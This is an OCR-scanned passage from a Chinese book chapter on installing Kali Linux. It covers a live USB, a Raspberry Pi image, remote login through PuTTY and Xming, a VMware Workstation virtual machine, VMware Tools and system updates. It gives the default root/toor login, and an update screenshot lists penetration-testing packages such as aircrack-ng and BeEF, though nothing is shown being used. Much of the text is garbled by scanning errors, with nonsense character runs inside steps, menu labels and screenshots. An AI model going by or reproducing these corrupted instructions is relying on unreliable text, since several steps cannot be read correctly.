创建 Linux 发 行 版 的 一 个 可 引导 Live USB 驱动 器 ， 它 包括 Kali Linux 的 持续 存储 。 本 小 节 
将 介绍 安装 Kali Linux 至 USB 驱动 器 的 操作 步骤 。 

安装 一 个 操作 系统 到 USB 驱动 器 上 和 安装 至 便 盘 有 点 不 同 。 所 以 , 在 安装 之 前 需要 做 
一 些 准 备 工 作 。 例 如 ， 从 哪 得 到 Linux? USB 驱动 器 的 格式 ? USB 驱动 器 的 大 小 ?…… 下 
面 将 逐一 列 出 这 些 要 求 。 

Q 一 个 FAT32 格式 的 USB 驱动 左 ， 并 且 最 小 有 8GB 的 空间 。 

O 一 个 Kali Linux ISO 映像 。 


es。 113 。 
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CP Win32 RNR OREA U R) 。 
Q F Kali Linux 从 http://www.kali.org/downloads/. 


前 面 的 准备 工作 完成 之 后 ， 就 可 以 来 安装 系统 了 。 安 装 Kali Linux 到 一 个 USB I3) at 
上 的 操作 步骤 如 下 所 示 。 


(1) 插入 到 Windows 系统 一 个 被 格式 化 并 且 可 写 入 的 USB 驱动 器 。 插 入 后 ， 显 示 界 
面 如 图 1.23 所 示 。 


4 有 可 移动 存储 的 设备 (4) 


a BD-ROM 驱动 器 (F:) a DVD RW 驱动 器 (G:) 

f KINGSTON (J:) 
2 7 CD 驱动 器 (H) Gu LR 
$ > 28.9 GB 可 用 , # 29.0 GB 


图 1.23 可 移动 设备 


(2) 启动 Win32 Disk Imager， 启 动 界面 如 图 1.24 所 示 。 在 Image File f E, Hit eK 
标 选 择 Kali Linux DVD ISO 映像 所 在 的 位 置 , 选择 将 要 安装 Kali Linux 的 USB 设备 ,本 例 


中 的 设备 为 K。 选 择 ISO 映像 文件 和 USB 设备 后 ， 单 击 Write zl, 34 ISO 文件 号 入 到 
USB Jk 5J air o 


Image File 
I:/ISO38f Sz PE/Kali /Ikali-linux-1.0. 6-i386. iso 


MDS Hash: 


Progress 


Version: 0.9.5 | Cancel | Read | 


Done. 


图 1.24 Win32 Disk Imager 初始 界面 


(3) 使 用 UNetbootin 工具 将 设备 K 做 成 一 个 USB JAH. JAZ UNetbootin 工具 ,将 
显示 如 图 1.25 所 示 的 界面 。 


E UNe:bootin N 
© 发 行 版 种: [== ERAT = IE dim = >| 
WOA UNetbovtin: 遂 用 陀 络 引导 安 革 程序 。 尾 法: 


2 uote REER ik HERES E 


|o 光盘 箭 像 I) 


EVit Kali Vea i-Linux-1. 0. 8-136. iso 


Space usel to preserve files across reboots (Ubuntu only): 4(96 =| 
AAT: 


CFT | 3 


图 1.25 选择 光盘 镜像 
。1]14 。 
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4) 在 该 界面 选择 “光盘 镜像 > 复 选 框 , 然后 选择 ISO 文件 所 在 的 位 置 , 并 将 Space used 
toPreserve files across reboots 设置 为 4096MB。 

(5) 选择 USB Kaas, ABH USB Kaa AK, ao "og" feel, ITE 
创建 可 引导 的 USB Kah at. 

(6) 创建 完成 后 ， 将 显示 如 图 1.26 所 示 的 界面 。 


mf UNe:bootin 


1. 下 载 文 牛 Gt 成 ; 

2. ERASUN GER) 

3. FÆ Bootlosder RR) 

4 安装 完成 ， BB (处 理 中 ) 


重启 后 ,在 BIOS ERE piki SB 启动 kA 


Hire gu? 


图 1.26 UNetbootin 安装 完成 


(7) 此 时 ，USB 驱动 器 就 创建 成 功 了 。 在 该 界面 单 击 “ 现 在 重启 ”按钮 ， 进 入 BIOS 
启动 菜单 里 选择 USB 启动 ， 就 可 以 安装 Kali Linux 操作 系统 了 。 


143 ”安装 至 树 每 派 


BREUR CELHA "Raspberry PE”， 人 简写 为 RPi) 是 一 于 基于 ARM 的 微型 电脑 主板 ， 
以 SD FPE. AS AER, TER EUR Kali Linux 是 一 个 不 错 的 选择 。 本 
小 方 将 介绍 在 树 每 派 上 安装 Kali Linux 操作 系统 。 

(1) 从 http://www.offensive-security.com/kali-linux-vmware-arm-image-download/ 网 站 下 
载 树 每 派 的 映像 文件 ， 其 文件 名 为 kali-linux-1.0.6a-rpi.img.xz. 

(2) 下 载 的 映像 文件 是 一 个 压缩 包 ， 需 要 使 用 7-Zip 压缩 软件 解 讨 。 解 压 后 其 名 称 为 
kali-linux-1.0.6a-rpi.1mg. 

(3) 使 用 Win32 Disk Imager 工具 ， 将 解压 后 的 映像 文件 写 入 到 树 每 派 的 SD BHP. JA 
动 Win32 Disk Imager 工具 ， 将 显示 如 图 1.27 所 示 的 界面 。 


*& Win32 Disk Imager EXP x) 


(Copy | [E] MDS Hash: 


Progress 


Version: 0.9 | Cancel || || Write 


图 1.27 Win32 Disk Imager 启动 界面 


。]1S 。 
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(4) 在 该 界面 单 击 国 图 标 , 选择 kali-linux-1.0.6a-rpi.img, 将 显示 如 图 1.28 所 示 的 界面 。 
(5) 此 时 在 该 界面 单 击 Write 按钮 ， 将 显示 如 图 1.29 所 示 的 界面 。 


Win32 Disk Imager 
Image 了 Te 一 
F: {TSOP (+/Kali /kali-linux-1.0. Ba-rpi. img] = 


Copy | EY NDS Hash: Writing to a physical device can corrupt the device. 


(Target Device: [G:\] *") 
Are you sure you want to continue? 


Progress 


Version: 0.9 Cancel 


图 1.28 添加 映像 文件 图 1.29 确认 写 入 数据 的 磁盘 


(6) 该 界面 提示 是 否 确 定 要 将 输入 写 入 到 G 设备 吗 ? 这 里 选择 Yes， 将 显示 如 图 1.30 
所 示 的 界面 。 
CI) 从 该 界面 可 以 看 到 正在 写 入 数据 。 写 入 完成 后 ， 将 显示 如 图 1.31 所 示 的 界面 。 


Image File 
F:/ISOfR [8 F Eal: /kali-linuz-1. 0.Ba-rpi. img 


Copy | [P] ADS Hash: 


Progress 


a SS SS 


24,777MB/s 


图 1.30 ”开始 写 入 数据 图 1.31 完成 写 入 数据 


(83) 从 该 界面 可 以 看 到 与 入 数据 成 功 。 此 时 单 击 OK 按钮 ， 将 返回 到 图 1.28 所 示 的 界 
面 。 然 后 单 击 Exit 按钮 ， 关 闭 Win32 Disk Imager 工具 

(9) 此 时 从 Windows 系统 中 弹出 SD 卡 ， 并 且 将 其 插入 到 树 医 派 中 。 然 后 连接 到 显示 
器 ， 插 上 网 线 、 鼠 标 、 键 盘 和 电源 ， 几 秒 后 将 局 动 Kali Linux 操作 系统 。 使 用 Kali 默认 的 
用 户 名 和 密码 登录 ， 其 默认 用 户 名 和 密码 为 root 和 toor。 

如 果 用 户 觉 得 使 用 树 每 派 上 的 Kali 来 回 插 一 些 设备 比较 态 烦 时 , 这 里 可 以 使 用 PuTTY 
攻击 远程 登录 到 Kali 的 命令 行 。 由 于 在 Linux 中 SSH 服务 默认 是 启动 的 , 所 以 用 户 可 以 在 
PuTTY 中 使 用 SSH 服务 的 22 端口 远程 连接 到 Kali Linux。PuTTY 不 仅仅 只 能 远程 连接 到 
树 每 派 上 的 Kali 操作 系统 , 它 可 以 连接 到 安装 在 任何 设备 上 的 Kali 操作 系统 。 下 面 将 介绍 
使 用 PuTTY 工具 ， 远 程 连接 到 Kali Linux 操作 系统 。 

(1) 下 载 PuTTY 的 Windows 版 本 。 

(2) 局 动 PuTTY 工具 ， 将 显示 如 图 1.32 所 示 的 界面 。 

(3) 在 该 界面 ，Host Name (or IP address) 对 应 的 文本 框 中 输入 Kali 系统 的 IP HEHE, 
并 日 Connection type 选择 SSH。 然 后 单 击 Open 按钮 ， 将 显示 如 图 1.33 所 示 的 界面 。 如 果 
不 知道 Kali 系统 IP 的话， 执行 ifconfig án f. 
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192.168.6.101 


OR» © Tenet C Rogn G SSH © Seral 


Load, save or delete a stored session The server's host key is not cached in the registry. You 


Saved Sessions have no guarantee that the server is th» computer you 
think it is. 


The server's rsa? key fingerprint is: 

ssh-rsa 2048 07:f9:c5:2a:f1:6a:3b:75:04:2d:6d:6b:82:f5:21:f8 
If you trust this host, hit Yes to add the key to 

PuTTY's cache and carry cn connecting. 

If you want to carry on connecting just once, without 
adding the kcy to the cache, hit No. 

If you do no: trust this host, hit Cancel to abandon the 


图 1.32 PuTTY LA 图 1.33 ”警告 信息 


(4) 该 界面 显示 了 一 个 警告 信息 ， 这 是 为 了 安全 确认 是 否 要 连接 到 该 服务 左 。 该 对 话 
框 只 有 在 第 一 次 连接 茶 台 主机 时 才 会 弹出 。 这 里 单 击 “ 是 ”按钮 ， 将 显示 如 图 1.34 所 示 的 
Fr hl o 


gp 192.168.6.101 - PuTTY 


login as: root 
root@i92.168.6.101's password: 
Linux kali 3.13.0 #1 PREEMPT Sun Jan 26 03:02:20 UTC 2014 armv6l 


The programs included with the Kali GNU/Linux system are free software; 
the exact distribution terms for each program are described in the 
individual files in /usr/share/doc/*/copyright. 


Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 


‘jroot@kali:~# 


图 1.34 登录 到 Kali 系统 


(5) 在 该 界面 输入 Kali 系统 默认 的 用 户 命 和 密码 登录 到 系统 ,现在 就 可 以 在 该 系统 下 ， 
运行 任何 的 命令 了 。 

如 果 用 户 不 喜欢 在 命令 行 下 操作 的 话 ， 也 可 以 远程 连接 到 Kali Linux 的 图 形 界 面 。 下 
面 将 介绍 通过 安装 Xming 软件 ， 实 现在 PuTTY 下 连接 到 Kali 操作 系统 的 图 形 界面 。 

(1) 从 http://sourceforge.net/projects/xming/ 网 站 下 载 Xming 软件 。 

(2) 局 动 下 载 的 Xming 软件 ， 将 显示 如 图 1.35 所 示 的 界面 。 

(3) 该 界面 显示 了 Xming 的 欢迎 信息 。 此 时 单 击 Next 按钮 ， 将 显示 如 图 1.36 所 示 的 
界面 。 

(4) 在 该 界面 选择 Xming 的 安装 位 置 。 这 里 使 用 默认 的 位 置 ， 单 击 Next 按钮 ， 将 显 
示 如 图 1.37 所 示 的 界面 。 

C5) 在 该 界面 选择 安装 的 组 件 。 这 里 选择 Don't install an SSH client 组 件 , 然后 单 击 Next 
按钮 ， 将 显示 如 图 1.38 所 示 的 界面 。 
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Welcome to the Xming Setup en X 
Wizard | zm 


This will install Xming 6.90.31 on your computer. 


It is recommended that you close all other applications before 
continuing. 


Setup will install Xning into the following folder. 
J 


To continue, click Next. f you would like to select a cifferent folder, click Browse. 


C:\Program Files (x86)'Xmina| 


Click Next to continuc, or Caneel to exit Setup. 


At least 4.7 MB of free disk space is required. 


图 135 欢迎 界面 图 1.36 选择 安装 位 置 


Select Components Select Start Menu Folder 
Which components should be installed? Where should Setup place the program's shortcuts? 


install. on Neat iss os ii si S | Setup will create the program's shortcuts in tne following Start Menu folder. 
To continue, click Net. If you would like to select a cifferent folder, click Browse. 
[4] Xming binary 


V Non US Keboan suppor | mm gm 
XLaunch wzard - frontend for Xming 
Run utility - start programs with hidden console window 


OJ Dont install an SSH client 


Current selection requires at least 9.0 MB of disk space. Dont create a Start Menu folder 


图 1.37 选择 组 件 图 1.38 选择 局 动 来 单 文件 夹 


(6) 在 该 界面 选择 局 动 末 单 文件 来。 这 里 默认 是 Xming， 如 果 想 使 用 不 同 的 文件 夹 ， 
单 击 Browse 按钮 选择 新 的 文件 来。 如 果 使 用 默认 的 ， 则 单 击 Next 按钮 ， 将 显示 如 图 1.39 
所 示 的 界面 。 

(7) 在 该 界面 选择 Xming 创建 的 快捷 方式 。 这 里 选择 Create a desktop icon for Xming 
(在 果 面 上 创建 快捷 方式 〉 复 选 框 ， 然 后 单 击 Next 按钮 ， 将 显示 如 图 1.40 所 示 的 界面 。 


Select Additional Tasks 


Which additional tasks should be parformed? Setup is now ready to begin installing Xming on your computer. 


Pes the additional tasks you would like Setup to perform while installing Xming, then Click Install to continue with the installation, or click Back if you want to review or 
ext. 


change any settings. 


Additional icons: 

Create a desktop icon for Xmirg 

[7] Create a desktop icon for XLaunch 

[7] Create a Quick Launch icon fcr Xming 

[E] Create a Quick Launch icon ter XLaunch 

Other tasks: 

[V] Associate XLaunch.exe with the xlaunch file extension 


Destination location : 
C:\Program Files (x86) Xming 


Setup type: 
Custom ins-allation 


Selected components: 
Xming binary 
Non US Keyboard support 
XLaunch wizard - frontend for Xming 
with hidden console wndow 


Run utility - statt programs 
Dont instal an SSH client 


图 1.39 选择 额外 的 任务 图 1.40 ”准备 安装 Xming 


e. |e 
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(8) 六 通过 前 面 的 步骤 将 Xming 进行 了 配置 。 现 在 准备 安装 ， 单 击 Install 按钮 ， 将 显示 
如 图 1.41 所 示 的 界面 。 


Completing the Xming Setup 
Wizard 


图 1.41 安装 完成 


(9) 从 该 界面 可 以 看 到 Xming PPR THK. VEIN AG Finish 按钮 退出 设置 ， 并 
日 Xming 将 会 运行 。 如 果 不 想 要 Xming 局 动 的 话 ， 将 Launch Xming 前 和 面 复 选 框 的 对 勾 
Xd. 

(10) 现在 打开 PuTTY 工具 ， 并 且 输 入 Kali 系统 的 卫 地址， 如 图 1.32 所 示 。 然 后 在 
PuTTY 左 侧 栏 Category 下 依次 选择 Connection|SSH|X11 命令 ， 将 显示 如 图 1.42 所 示 的 
界面 。 


ÉR PUTTY Configuration ^. -—A 


X11 forwarding 
[V] Enable X11 forwarding 
X display location localhost:0j 


Remote X11 au dhenticatian protacal 
图 MIT-Magc-Cookie-1 © XDM-Authorization-1 


X authority file for local display 


图 1.42 Wig PuTTY 


C11) 在 该 界面 选择 Enable X11 forwarding SHE, Jf H.E X display location 对 应 的 文 
UN localhost:0。 然 后 单 击 Open ee JAB PuTTY 2th CERME Xming 在 后 
运行 ) 。 然 后 输出 Kali 系统 的 用 户 名 和 密码 ， 成 功 连接 到 Kali 操作 系统 ， 如 图 1.43 所 示 。 
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gp 192.1686.101 - PuTTY 


login as: root 
root8192.168.6.101's password: 
Linux kali 3.13.0 #1 PREEMPT Sun Jan 26 03:02:20 UTC 2014 armvél 


The programs included with the Kali GNU/Linux system are free software; 
the exact distribution terms for each program are described in the 
individual files in /usr/share/doc/*/copyright. 


Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 
permitted by applicable law. 

Last login: Tue Jul 8 08:27:57 2014 from 192.168.6.102 
root@kali:~# 


图 1.43 ”远程 连接 成 功 


(12) 从 该 界面 可 以 看 到 成 功 连 接 到 了 Kali 操作 系统 。 现 在 就 可 以 远程 连接 到 Kali 的 
图 形 界 面 了 ， 执 行 命令 如 下 所 示 : 
root@kali:~# xfce4-session 


执行 以 上 命令 后 ， 将 远程 登录 到 Kali REKER H 


AE: 在 PuTTY 下 ，startx 命令 不 能 运行 
1.4.4 安装 至 VMware Workstation 


VMware Workstation 是 一 于 功能 强大 的 果 面 虚拟 计算 机 软件 。 它 允许 用 户 在 单一 的 时 
面 上 同时 运行 不 同 的 操作 系统 。 用 户 在 其 中 可 以 进行 开发 、 测 试 和 部 署 新 的 应 用 程序 。 目 
前 最 新 版 本 是 10.0.1， 官 方 下 载 地 址 https:/my.vmware.conycn/web/vmware/downloads。 本 
小 节 将 介绍 在 VMware Workstation 上 安装 Kali Linux 操作 系统 。 

(1) 局 动 VMware Workstation， 将 显示 如 图 1.44 所 示 的 界面 。 


打开 虚拟 机 / , ^N 软件 更 新 
$ 检查 VMware Workstation 的 软件 更 


图 1.44 VMware Workstation 10 
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(2 六 在 该 界面 单 击 “创建 新 的 虚拟 机 ”图 标 ， 将 显示 如 图 1.45 所 示 的 界面 。 


欢迎 使 用 新 建 虚 拟 机 向 导 


您 希望 使 用 什么 类 型 的 配置 ? 


© 典型 (推荐 儿 T) 
通过 几 个 简单 的 步 驼 创建 Workstation 10.0 
虚拟 机 。 


© 自 定 义 {( 高 级 儿 C) 
创建 带 有 sen Scag cca S ince 
vmware Um pa ware 产品 兼容 性 等 高 汲 选 项 


Workstation 


‘上 -上 (8) | (inama) [— 3e. 


图 1.45 新 建 虚 拟 机 回 导 


(3) 该 界面 选择 安 疫 虚 拟 机 的 类 型 ， 包 括 “ 和 典型 ”和 “ 目 定 义 ” 两 种 。 这 里 推荐 使 用 
“典型 ”的 方式 ， 然 后 单 击 “ 下 一 步 ” 按 钮 ， 将 显示 如 图 1.46 所 示 的 界面 。 


新 建 庶 拟 机 向 且 
安装 客户 机 操作 系统 
虚拟 机 如同 物理 机 ， 霖 要 操作 系统 。 您 将 如 | 可 安装 客户 机 操作 系统 ? 
安装 来 源 : 
© 安装 程序 光盘 (D): 
(Gi BD-ROM 驱动 器 (=:) 


© 223€ FROID (9 S7 (E (iso )(M): 
| EUSO (S37 (fF Wall ali-linux-1.0.5-:386.iso 


@ 稍 后 安装 损 作 系统 (5)* 
创建 的 虚拟 机 将 包含 一 个 空白 硬盘 。 


图 1.46 安装 客户 机 操作 系统 


(4) 该 界面 用 来 选择 如 何 安 闭 客户 机 操作 系统 。 这 里 选择 “ 稍 后 安 闭 操作 系统 ”， 然 
后 单 击 “下 一 步 ”按钮 ， 将 显示 如 图 1.47 所 示 的 界面 。 
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选择 客户 机 操作 系统 
此 虚拟 机 中 将 安装 哪 种 操作 系统 ? 


客户 机 操作 系统 


© Microsoft Windows(W) 
@ Linux(L) 

© Novell NetWare(E) 

© Solaris(S) 

© VMware ESX(X) 

© #4h(0) 


图 1.47 选择 客户 机 操作 系统 


(5) 在 该 界面 选择 要 安装 的 操作 系统 和 版 本 。 这 里 选择 Linux 操作 系统 ， 版 本 为 其 他 
Linux 2.6.X 内 核 ， 然 后 单 击 “ 下 一 步 ”按钮 ， 将 显示 如 图 1.48 所 示 的 界面 。 


命名 虚拟 机 
您 要 为 此 虚拟 机 使 用 什么 名 称 ? 


虚拟 机 名 称 (V): 
Kali Linux 
tas): 


D:\Kal CR). 
在 "编辑 "> BA hE ERRA o 


图 1.48 命名 虚拟 机 


(6) 在 该 界面 为 虚拟 机 创建 一 个 名 称 ， 并 设置 虚拟 机 的 安装 位 置 。 设 置 完成 后 ， 单 击 
“下 一 步 ”按钮 ， 将 显示 如 图 1.49 所 示 的 界面 。 
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指定 磁盘 容量 
磁盘 太 小 为 多 少 ? 


虚拟 机 的 硬盘 作为 一 个 或 多 个 文件 存 铺 在 主机 的 物理 磁盘 中 。 这 些 文件 最 初 很 
小 ， 随 着 您 同 虚拟 机 中 添加 应 用 程序 、 康 件 和 数据 而 他 新 变 大 。 


最 大 磁盘 大 小 (GBJ(S): solo = 


针对 其 他 Linux 2.6.x 内 核 的 建议 大 小 : 8 GB 


© Fea HAAS TAO) 


© 将 虚拟 三 盘 拆 分 成 条 个 文件 (M) 
ot ker 可 以 更 轻 榨 地 在 计算 机 之 间 移 动 虚拟 机 ， 但 互 能 会 库 低 大 容量 磁盘 的 
性 能 。 


图 1.49 ”指定 磁盘 容量 


(7) 在 该 界面 设置 磁盘 的 容量 。 如 打 有 足够 大 的 们 盘 时 ， 建 议 设置 的 磁盘 容量 大 点 ， 
避免 造成 磁盘 容量 不 足 。 这 里 设置 为 50GB， 然 后 单 击 “ 下 一 步 ” 按 钮 ， 将 显示 如 图 1.50 
所 示 的 界面 。 


Kali Lnux 

D:\Kali 

Workstation 10.9 
其 他 nux 2.6.x 内 核 


50 GB, 拆 分 


图 1.50 已 准备 好 创建 虚拟 机 


(8) 该 界面 显示 了 所 创建 虚拟 机 的 详细 信息 ， 此 时 就 可 以 创建 操作 系统 了 。 然 后 单 击 
“完成 ”按钮 ， 将 显示 如 图 1.51 所 示 的 界面 。 
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回 Kali Linux - VMware Workstation 
文件 (F) ”编辑 (E) BBV) ”虚拟 机 (M) RET) ”帮助 (H) 


2 主页 X | E Kali Linux x | 


{H Kali Linux 


b 开启 此 虚拟 机 
Of RENEE 


vias 
AF 256 MB 
同 处 理 器 1 
3 eR Scsh 50 GB 
*)CD/DVD (IDE) Bare 
REDE V NAT 
USB 控制 器 存在 
QE 自动 检测 
性 打印 机 存在 
[ Ev Exe -» 虚拟 机 详细 信息 
状态 : 已 关机 


v fait 配置 文件 : D:\Kal\Kali Linux.vmx 
硬件 兼容 性 : Workstation 10.0 虚拟 机 


TEMAS A STE PLA. 


图 1.51 创建 虚拟 机 


(9) 该 界面 显示 了 新 创建 的 虚拟 机 的 详细 信息 。 现在 准备 安装 Kali Linux. ZX Kali 
Linux 之 前 需要 设置 一 些 信 息 ， 在 VMware Workstation 窗口 中 单 击 “ 编 辑 虚 拟 机 设置 ”， 
将 显示 如 图 1.52 所 示 的 界面 。 


设备 状态 
Eisse(C) 

: [V 启动 本 连接 (O) 

50 GB 

连接 

er NAT © 志 用 物理 驱动 器 (F): 
USB 控制 存在 — 

QE 自动 检测 ILU NN 

deb TED 存在 © +H 150 Bf Sz (E (M): 


L T E 自动 检测 ESOR IR V FF \Kall\kalHlinux v M(B)... 
RNV). | 


图 1.52 虚拟 机 设置 


(10) 在 该 界面 选择 “CD/DVD CIDE) ”选项 ， 接 着 在 右 侧 选择 “使 用 ISO 映像 文件 ” 
复 选 框 ， 单 击 “ 浏 览 ” 按 钮 ， 选 择 Kali Linux 的 映像 文件 。 然 后 单 击 “ 确 定 ” 按 钮 ， 将 返 
回 到 图 1.51 所 示 的 界面 。 

(11) 在 图 1.51 界面 ， 选 择 “ 开 局 此 虚拟 机 ”命令 ， 将 显示 一 个 新 的 窗口 ， 如 图 1.53 
所 示 。 
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KAPIPUNUR 


Boot menu 
Live (586-pae) 

Live (585-pae failsafe) 

Live (forensic mode) 

Install 

Graphical install 


Install with speech synthesis 


Press ENTER to boot or TAB to edit a menu entry 


图 1.53 ”安装 界面 
(12) 接 下 来 的 安装 过 程 和 在 第 1.4.1 小 节 中 介绍 的 过 程 一 样 了 ， 这 里 就 不 再 歼 述 。 


rs 3PE 


1.4.5 "EX 


VMware Tools 


VMware Tools 是 VMware Hes NL Er Hg — RIS Leto | 标签 m) 帮助 (H) 


H. 


FNO 


它 是 VMware 提供 的 增强 虚拟 显卡 和 硬盘 性 能 ， 以 及 S 


电源 > 
可 移动 设备 (D) > 


同步 虚拟 机 与 主机 时 钟 的 驱动 程序 。 只 有 在 VMware 虚拟 i intial 
机 中 安装 好 VMware Tools 工具 后 ， 才 能 实现 主机 与 虚拟 机 c cii Ctrl+G 
ZB CEFR SS, TAIN A SFE A ERE, pp th UI |e 
在 虚拟 机 与 主机 之 间 目 由 移动 (不 用 再 按 Ctrl+Alt 2H 6 $8 D EEC) iiaia 
本 小 节 将 介绍 VMware Tools 程序 的 安装 。 2 Á— ; 


(1) Æ VMware Workstation 菜单 栏 中 ， 依 次 选择 “ 虐 


安装 VMware Tools... 


FUL” | * Z2 VMware Tools...” Mme, "ul 1.54 所 示 。 设置 (S).. Ctrl+D 


(2) 24% VMware Tools 安装 程序 到 /mntcdromy/ 目 录 。 
执行 命令 如 下 所 示 : 


图 1.54 ”安装 VMware Tools 


root@kali:~# mkdir /mnt/cdrom/ # 创 建 挂 载 点 
root@kali:~# mount /dev/cdrom /mnt/cdrom/ # 挂 载 安 装 程序 


mount: block device /dev/sr0 is write-protected, mounting read-only 


看 到 以 上 的 输出 信息 ， 表 示 VMware Tools 安装 程序 挂 载 成 功 了 。 
(3) 切换 到 挂 载 位 置 ， 解 压 安 装 程序 VMwareTools。 执 行 命令 如 下 所 示 : 


root@kali:~# cd /mnt/cdrom/ # 切 换 目 录 
root@kali:/mnt/cdrom# Is 查看 当前 目录 下 的 文件 


manifest.txt VMwareTools-9.6.1-1378637.tar.gz vmware-tools-upgrader-64 
run_upgrader.sh vmware-tools-upgrader-32 
root@kali:/mnt/cdrom# tar zxvf VMwareT ools-9.6.1-1378637.tar.gz -C / 

# 解 庄 VMwareTools 安装 程序 
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执行 以 上 命令 后 ，VMware Tools 程序 将 被 解压 到 /目录 中 ， 并 生成 一 个 名 为 
vmware-tools-distrib Y: fF 3 , 
(4) 切换 到 VMware Tools 的 目录 ， 并 运行 安装 程序 。 执 行 命令 如 下 所 示 : 


root@kali:/mnt/cdrom# cd /vmware-tools-distrib/ # 切 换 目 录 
root@kali:/vmware-tools-distrib# ./vmware-install.pl # 运 行 安装 程序 


执行 以 上 命令 后 ， 会 出 现 一 些 问 题 。 这 时 按 下 “ 回 车 ” 键 ， 接 受 的 认 值 。 
(50 重新 局 动 计算 机 。 


1.5 Kali 更 新 与 升级 


当 用 户 使 用 一 段 时 间 以 后 ， 可 能 对 总 是 在 没有 任何 变化 的 系统 中 工作 感到 不 满 ， 而 是 
iy ERE Windows 系统 中 一 样 ， 不 断 对 目 己 的 Linux 进行 升级 。 另 外 ，Linux AY wie 
一 个 开放 的 系统 ， 每 天 都 会 有 新 的 软件 出 现 ，Linux 发 行 套件 和 内 核 也 在 不 断 更 新 。 在 这 
样 的 情况 下 ， 学 会 对 Linux 进行 升级 就 显得 非常 迫切 了 。 本 节 将 介绍 Kali 的 更 新 与 升级 。 

更 新 与 升级 Kali 的 具体 操作 步骤 如 下 所 示 。 0 

(1) 在 图 形 界面 依次 选择 “应 用 程序 ”|“ 系 A 软件 更 新 查看 器 正 以 特权 用 户 身份 运行 


统 工具 ”|“ 软 件 更 新 ”命令 ， 将 显示 如 图 1.55 所 ed EESANDACRDGTEDROERNUN. 

示 的 界面 。 取消 (c) || 确认 继续 (A) | 
(2) 该 界面 提示 确认 是 否 要 以 特权 用 户 身 份 

运行 该 应 用 程序 ， 如 果 继 续 ， 单 击 “ 确 认 继续 ?” 图 1.55 ”警告 信息 


按钮 ， 将 显示 如 图 1.56 所 示 的 界面 。 
| 软件 更 新 umm 


的 345 个 更 新 可 用 
软件 更 新 可 更 正 软 件 中 的 错误 、 修 补 安全 漏洞 以 及 提供 新 功能 。 


r An 802.11 WEP and WPA-PSK key cracking program - 
| aircrack-ng-1.2-beta3-Okalil (32 fU) | 
r Apache HTTP Server metapackage L4 KB 
| | apache2-2.2.22-13+deb7ul (32 fù) 
iw Apache HTTP Server - traditional non-threaded model T 
| apache 2-mpm-prefork-2.2.22-13--deb7u1 (32 位 ) i 
Ir utility programs for webservers 162.5 
apache2-utils-2.2.22-13--deb7u1 (32 位 ) i 

wo Apache HTTP Server common binary files —À 
| ^ apache2.2-bin-2.2.22-13--deb7u1 (32 位 ) — 

v Apache HTTP Server common files 91.1 Ki 
| apache 2.2-common-2.2.22-13--deb7u1 (32 位 ) 

v A tool for reverse engineering Android apk files 5 MI 
+ 详细 信息 

© REMEH. 

已 选 定 345 个 更 新 (971.5 MB) | 退出 (Q) | 安装 更 新 (|) ， 


图 1.56 软件 更 新 
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(3 六 该 界面 显示 了 总 共有 345 个 软件 包 需 要 更 新 ， 单 击 “ 安 装 更 新 ”按钮 ， 将 显示 如 
1.57 所 示 的 界面 。 


(4) 该 界面 显示 了 安装 更 新 软件 包 依赖 的 软件 包 , 单 击 “继续 ”按钮 , 将 显示 如 图 1.58 
所 示 的 界面 。 


需要 额外 的 确认 
欲 更 新 以 下 软件 包 ， 有 其 他 软件 需要 被 修改 。 D 345 个 更 新 可 用 
软件 更 新 可 更 正 软件 中 的 错误 、 修 补 安全 漏洞 以 及 提供 新 功能 。 
| 安装 删除 " Beer liiis Framework (BeEF) — bundled ruby li... "ue 
beef-xss-bundle-0.4.4.9-Okali4 (32 位 ) mM 


为 了 满足 依赖 关系 ， 还 需要 安装 以 下 软件 : 630.2 MB 
4^ firmware e im tool 80.0 KB 
= arp scanning and fingerprinting tool | binwalk- -1-1kali0 j 
ir | n-1.2-UÜkalil E Bluetooth sca semma — 
= Ethernet/FDDI station activity monitor DREGE NIE EO HA 
iri tch la | T) - Mass SNMP scanner 
: , braa-0.82-1kali3 (32 位 ) 
light download accelerator - console versi: 
= »xel-2.4-1 | z Bullyi is a new pes seiten. of the WPS brute force att.. 
bully-1.! Okalil (32 位 ) 
= Microsoft Cabinet file unpacker 


| o Network sniffer to extract CDP information 
psnarf-0.1.6-1kali3 (32 位 


= Configuration tool for amateur radios 


= Custom wordlist generator 18.7K 


— cewl-50-lkali5 
+ 详细 信息 
门 不 再 显示 和 gem 正 在 下 载 软件 包 
取消 (C) ”继续 | Bit 345 个 更 新 (971.5 MB) | MH || 安装 更 新 (|) 
图 1.57 依赖 软件 包 图 1.58 软件 更 新 过 程 


(5) 从 该 界面 可 以 看 到 软件 更 新 的 一 个 进度 。 在 该 界面 ， 可 以 看 到 各 软件 包 的 一 个 不 
同 状态 。 其 中 ， 软 件 包 后 面 出 现 国 图 标 ， 表 示 访 软件 包 正 在 下 载 ， 如果 显示 为 匡 图 标 ， 表 
示 软 件 包 已 下 载 ， 如 果 同 时 出 现 矶 和 四 图 标的 话 ， 表 示 安 装 完 该 软件 包 后 ， 需 要 重新 局 动 
系统 ; 这 些 软 件 包 安 状 成 功 后 ， 将 显示 为 者 图 标 。 这 时 候 单 击 “ 退 出 ”按钮 ， 然 后 重新 
局 动 系统 。 在 更 新 的 过 程 中 ， 未 下 载 的 软件 包 会 自动 跳 到 第 一 列 。 此 时 ， 滚 动 鼠 标 是 无 
用 的 。 

(6) 重新 局 动 系统 后 ， 登 录 到 系统 执行 lsb_release -a 命令 得 看 当前 操作 系统 的 所 有 版 
本 信息 。 执 行 命令 如 下 所 示 : 


root@kali:~# Isb_release -a 


No LSB modules are available. # 无 效 的 LSB 模块 
Distributor ID: Debian HATH 
Description: | Debian GNU/Linux Kali Linux 1.0.6 TH [st 
Release: Kali Linux 1.0.6 # 版 本 信息 
Codename: n/a # 代 号 


从 输出 的 信息 中 ， 可 以 看 到 当前 系统 版 本 为 1.0.6。 以 上 命令 适用 于 所 有 的 Linux， 包 
ff RedHat, SuSE 和 Debian 等 发 行 版 。 如 果 仅 查看 版 本 号 ， 可 以 查看 /etc/issue 文件 。 执 行 
命令 如 下 所 示 : 


root@kali:~# cat /etc/issue 
Kali GNU/Linux 1.0.6 \n V 


从 输出 的 信息 中 ， 可 以 看 到 当前 系统 的 版 本 为 1.0.6. 
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16 基本 设置 


在 前 面 学 习 了 Kali Linux 操作 系统 的 安装 ， 安 装 成 功 后 就 可 以 登录 到 系统 了 。 登 录 系 
